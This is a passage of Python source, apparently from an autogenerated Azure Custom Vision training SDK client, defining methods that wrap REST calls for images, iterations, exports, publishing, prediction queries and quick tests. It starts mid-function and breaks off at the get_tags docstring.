        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Optional query-string parameters (each sent only when provided).
    query = {}
    if iteration_id is not None:
        query['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
    if order_by is not None:
        query['orderBy'] = self._serialize.query("order_by", order_by, 'str')
    if take is not None:
        query['take'] = self._serialize.query("take", take, 'int', maximum=256, minimum=0)
    if skip is not None:
        query['skip'] = self._serialize.query("skip", skip, 'int')

    # Request headers, merged with any caller-supplied ones.
    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    # Issue the GET and map any non-200 status to the service exception.
    request = self._client.get(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('[Image]', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_untagged_images.metadata = {'url': '/projects/{projectId}/images/untagged'}
def get_untagged_image_count(
        self, project_id, iteration_id=None, custom_headers=None, raw=False, **operation_config):
    """Gets the number of untagged images.

    Returns the count of images that carry no tags for a given project
    and optionally an iteration. When no iteration is specified the
    current workspace is used.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: int or ClientRawResponse if raw=true
    :rtype: int or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.get_untagged_image_count.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Optional iteration scope.
    query = {}
    if iteration_id is not None:
        query['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')

    # Request headers, merged with any caller-supplied ones.
    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    # Issue the GET and map any non-200 status to the service exception.
    request = self._client.get(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('int', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_untagged_image_count.metadata = {'url': '/projects/{projectId}/images/untagged/count'}
def create_images_from_urls(
        self, project_id, images=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
    """Add the provided images urls to the set of training images.

    Accepts a batch of urls, and optionally tags, to create images. At
    most 64 images and 20 tags may be supplied per call.

    :param project_id: The project id.
    :type project_id: str
    :param images:
    :type images:
     list[~azure.cognitiveservices.vision.customvision.training.models.ImageUrlCreateEntry]
    :param tag_ids:
    :type tag_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ImageCreateSummary or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Wrap the inputs in the wire-format batch model.
    url_batch = models.ImageUrlCreateBatch(images=images, tag_ids=tag_ids)

    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.create_images_from_urls.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Request headers, merged with any caller-supplied ones.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # Serialize the body, POST it, and map non-200 to the service exception.
    payload = self._serialize.body(url_batch, 'ImageUrlCreateBatch')
    request = self._client.post(url, {}, headers, payload)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('ImageCreateSummary', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
create_images_from_urls.metadata = {'url': '/projects/{projectId}/images/urls'}
def get_iterations(
        self, project_id, custom_headers=None, raw=False, **operation_config):
    """List all iterations belonging to a project.

    :param project_id: The project id.
    :type project_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.Iteration]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the serialized path arguments.
    request_url = self._client.format_url(
        self.get_iterations.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Assemble headers; caller-supplied headers win over defaults.
    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    # Issue the GET and validate the status code.
    request = self._client.get(request_url, {}, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('[Iteration]', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
get_iterations.metadata = {'url': '/projects/{projectId}/iterations'}
def get_iteration(
        self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
    """Fetch a single iteration by id.

    :param project_id: The id of the project the iteration belongs to.
    :type project_id: str
    :param iteration_id: The id of the iteration to get.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Iteration or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Iteration
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Build the concrete request URL from the route template.
    request_url = self._client.format_url(
        self.get_iteration.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.get(request_url, {}, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('Iteration', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
get_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}'}
def delete_iteration(
        self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
    """Delete a specific iteration of a project.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: None or ClientRawResponse if raw=true
    :rtype: None or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.delete_iteration.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    # DELETE carries no body and expects no payload back.
    headers = {}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.delete(request_url, {}, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 204:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    if raw:
        return ClientRawResponse(None, resp)
delete_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}'}
def update_iteration(
        self, project_id, iteration_id, name, custom_headers=None, raw=False, **operation_config):
    """Rename a specific iteration via PATCH.

    :param project_id: Project id.
    :type project_id: str
    :param iteration_id: Iteration id.
    :type iteration_id: str
    :param name: Gets or sets the name of the iteration.
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Iteration or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Iteration
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Only the name is updatable through this operation.
    payload = models.Iteration(name=name)

    request_url = self._client.format_url(
        self.update_iteration.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    body = self._serialize.body(payload, 'Iteration')
    request = self._client.patch(request_url, {}, headers, body)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('Iteration', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
update_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}'}
def get_exports(
        self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
    """List the exports of a specific iteration.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.Export]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.get_exports.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.get(request_url, {}, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('[Export]', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
get_exports.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/export'}
def export_iteration(
        self, project_id, iteration_id, platform, flavor=None, custom_headers=None, raw=False, **operation_config):
    """Export a trained iteration for a target platform.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id.
    :type iteration_id: str
    :param platform: The target platform. Possible values include:
     'CoreML', 'TensorFlow', 'DockerFile', 'ONNX', 'VAIDK'
    :type platform: str
    :param flavor: The flavor of the target platform. Possible values
     include: 'Linux', 'Windows', 'ONNX10', 'ONNX12', 'ARM',
     'TensorFlowNormal', 'TensorFlowLite'
    :type flavor: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: Export or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.Export or
     ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.export_iteration.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    # platform is required; flavor is sent only when provided.
    query = {'platform': self._serialize.query("platform", platform, 'str')}
    if flavor is not None:
        query['flavor'] = self._serialize.query("flavor", flavor, 'str')

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.post(request_url, query, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('Export', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
export_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/export'}
def get_iteration_performance(
        self, project_id, iteration_id, threshold=None, overlap_threshold=None, custom_headers=None, raw=False, **operation_config):
    """Get detailed performance information about an iteration.

    :param project_id: The id of the project the iteration belongs to.
    :type project_id: str
    :param iteration_id: The id of the iteration to get.
    :type iteration_id: str
    :param threshold: The threshold used to determine true predictions.
    :type threshold: float
    :param overlap_threshold: If applicable, the bounding box overlap
     threshold used to determine true predictions.
    :type overlap_threshold: float
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: IterationPerformance or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.IterationPerformance
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.get_iteration_performance.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    # Both thresholds are optional query parameters.
    query = {}
    if threshold is not None:
        query['threshold'] = self._serialize.query("threshold", threshold, 'float')
    if overlap_threshold is not None:
        query['overlapThreshold'] = self._serialize.query("overlap_threshold", overlap_threshold, 'float')

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.get(request_url, query, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('IterationPerformance', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
get_iteration_performance.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/performance'}
def get_image_performances(
        self, project_id, iteration_id, tag_ids=None, order_by=None, take=50, skip=0, custom_headers=None, raw=False, **operation_config):
    """Get images with their predictions for a given project iteration.

    Supports batching and range selection; by default only the first 50
    matching images are returned. Use {take} and {skip} to page through
    results. Tag filtering is an and/or relationship: if the provided tag
    ids are for the "Dog" and "Cat" tags, images tagged with Dog and/or
    Cat are returned.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param tag_ids: A list of tags ids to filter the images. Defaults to
     all tagged images when null. Limited to 20.
    :type tag_ids: list[str]
    :param order_by: The ordering. Defaults to newest. Possible values
     include: 'Newest', 'Oldest'
    :type order_by: str
    :param take: Maximum number of images to return. Defaults to 50,
     limited to 256.
    :type take: int
    :param skip: Number of images to skip before beginning the image
     batch. Defaults to 0.
    :type skip: int
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.ImagePerformance]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.get_image_performances.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    # All query parameters are optional; omit the ones left at None.
    query = {}
    if tag_ids is not None:
        query['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
    if order_by is not None:
        query['orderBy'] = self._serialize.query("order_by", order_by, 'str')
    if take is not None:
        query['take'] = self._serialize.query("take", take, 'int', maximum=256, minimum=0)
    if skip is not None:
        query['skip'] = self._serialize.query("skip", skip, 'int')

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.get(request_url, query, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('[ImagePerformance]', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
get_image_performances.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/performance/images'}
def get_image_performance_count(
        self, project_id, iteration_id, tag_ids=None, custom_headers=None, raw=False, **operation_config):
    """Count images tagged with {tagIds} that have prediction results from
    training for iteration {iterationId}.

    Tag filtering is an and/or relationship: if the provided tag ids are
    for the "Dog" and "Cat" tags, images tagged with Dog and/or Cat are
    counted.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param tag_ids: A list of tags ids to filter the images to count.
     Defaults to all tags when null.
    :type tag_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: int or ClientRawResponse if raw=true
    :rtype: int or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.get_image_performance_count.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    query = {}
    if tag_ids is not None:
        query['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',')

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.get(request_url, query, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('int', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
get_image_performance_count.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/performance/images/count'}
def publish_iteration(
        self, project_id, iteration_id, publish_name, prediction_id, custom_headers=None, raw=False, **operation_config):
    """Publish a specific iteration to a prediction resource.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id.
    :type iteration_id: str
    :param publish_name: The name to give the published iteration.
    :type publish_name: str
    :param prediction_id: The id of the prediction resource to publish to.
    :type prediction_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: bool or ClientRawResponse if raw=true
    :rtype: bool or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.publish_iteration.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    # Both query parameters are required for this operation.
    query = {
        'publishName': self._serialize.query("publish_name", publish_name, 'str'),
        'predictionId': self._serialize.query("prediction_id", prediction_id, 'str'),
    }

    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.post(request_url, query, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('bool', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
publish_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/publish'}
def unpublish_iteration(
        self, project_id, iteration_id, custom_headers=None, raw=False, **operation_config):
    """Unpublish a specific iteration.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: None or ClientRawResponse if raw=true
    :rtype: None or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.unpublish_iteration.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'),
        iterationId=self._serialize.url("iteration_id", iteration_id, 'str'))

    # Unpublishing is a DELETE on the publish sub-resource; no body.
    headers = {}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.delete(request_url, {}, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 204:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    if raw:
        return ClientRawResponse(None, resp)
unpublish_iteration.metadata = {'url': '/projects/{projectId}/iterations/{iterationId}/publish'}
def delete_prediction(
        self, project_id, ids, custom_headers=None, raw=False, **operation_config):
    """Delete a set of predicted images and their associated prediction
    results.

    :param project_id: The project id.
    :type project_id: str
    :param ids: The prediction ids. Limited to 64.
    :type ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: None or ClientRawResponse if raw=true
    :rtype: None or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.delete_prediction.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # The id list is comma-joined into a single query parameter.
    query = {
        'ids': self._serialize.query("ids", ids, '[str]', div=',', max_items=64, min_items=0),
    }

    headers = {}
    if custom_headers:
        headers.update(custom_headers)

    request = self._client.delete(request_url, query, headers)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 204:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    if raw:
        return ClientRawResponse(None, resp)
delete_prediction.metadata = {'url': '/projects/{projectId}/predictions'}
def query_predictions(
        self, project_id, query, custom_headers=None, raw=False, **operation_config):
    """Get images that were sent to your prediction endpoint.

    :param project_id: The project id.
    :type project_id: str
    :param query: Parameters used to query the predictions. Limited to
     combining 2 tags.
    :type query:
     ~azure.cognitiveservices.vision.customvision.training.models.PredictionQueryToken
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: PredictionQueryResult or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.PredictionQueryResult
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.query_predictions.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # The query token travels in the request body, not the query string.
    body = self._serialize.body(query, 'PredictionQueryToken')
    request = self._client.post(request_url, {}, headers, body)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('PredictionQueryResult', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
query_predictions.metadata = {'url': '/projects/{projectId}/predictions/query'}
def quick_test_image(
        self, project_id, image_data, iteration_id=None, store=True, custom_headers=None, raw=False, **operation_config):
    """Quick test an image against a project iteration.

    :param project_id: The project id.
    :type project_id: str
    :param image_data: Binary image data. Supported formats are JPEG, GIF,
     PNG, and BMP. Supports images up to 6MB.
    :type image_data: Generator
    :param iteration_id: Optional. Specifies the id of a particular
     iteration to evaluate against. The default iteration for the project
     will be used when not specified.
    :type iteration_id: str
    :param store: Optional. Specifies whether or not to store the result
     of this prediction. The default is true, to store.
    :type store: bool
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ImagePrediction or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.ImagePrediction
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    request_url = self._client.format_url(
        self.quick_test_image.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    query = {}
    if iteration_id is not None:
        query['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
    if store is not None:
        query['store'] = self._serialize.query("store", store, 'bool')

    # Image bytes are sent as multipart form data, not a JSON body.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'multipart/form-data',
    }
    if custom_headers:
        headers.update(custom_headers)

    form_data = {
        'imageData': image_data,
    }
    request = self._client.post(request_url, query, headers, form_content=form_data)
    resp = self._client.send(request, stream=False, **operation_config)
    if resp.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, resp)

    result = self._deserialize('ImagePrediction', resp)
    if raw:
        return ClientRawResponse(result, resp)
    return result
quick_test_image.metadata = {'url': '/projects/{projectId}/quicktest/image'}
def quick_test_image_url(
        self, project_id, url, iteration_id=None, store=True, custom_headers=None, raw=False, **operation_config):
    """Quick test an image url.

    Runs a prediction for the image at *url* against the given (or default)
    iteration, optionally storing the prediction result.

    :param project_id: The project to evaluate against.
    :type project_id: str
    :param url: Url of the image.
    :type url: str
    :param iteration_id: Optional id of the iteration to evaluate against;
     the project's default iteration is used when omitted.
    :type iteration_id: str
    :param store: Whether to store the result of this prediction
     (default: true, to store).
    :type store: bool
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ImagePrediction or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.ImagePrediction
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    image_url = models.ImageUrl(url=url)

    # Resolve the templated URL for this operation.
    path_args = {
        'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        'projectId': self._serialize.url("project_id", project_id, 'str')
    }
    url = self._client.format_url(
        self.quick_test_image_url.metadata['url'], **path_args)

    # Optional query parameters.
    query_parameters = {}
    if iteration_id is not None:
        query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
    if store is not None:
        query_parameters['store'] = self._serialize.query("store", store, 'bool')

    # Headers, with caller-supplied overrides applied last.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        header_parameters.update(custom_headers)

    # Serialize the body and send the request.
    body_content = self._serialize.body(image_url, 'ImageUrl')
    request = self._client.post(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('ImagePrediction', response) if response.status_code == 200 else None

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
quick_test_image_url.metadata = {'url': '/projects/{projectId}/quicktest/url'}
def get_tags(
        self, project_id, iteration_id=None, custom_headers=None, raw=False, **operation_config):
    """Get the tags for a given project and iteration.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.Tag]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
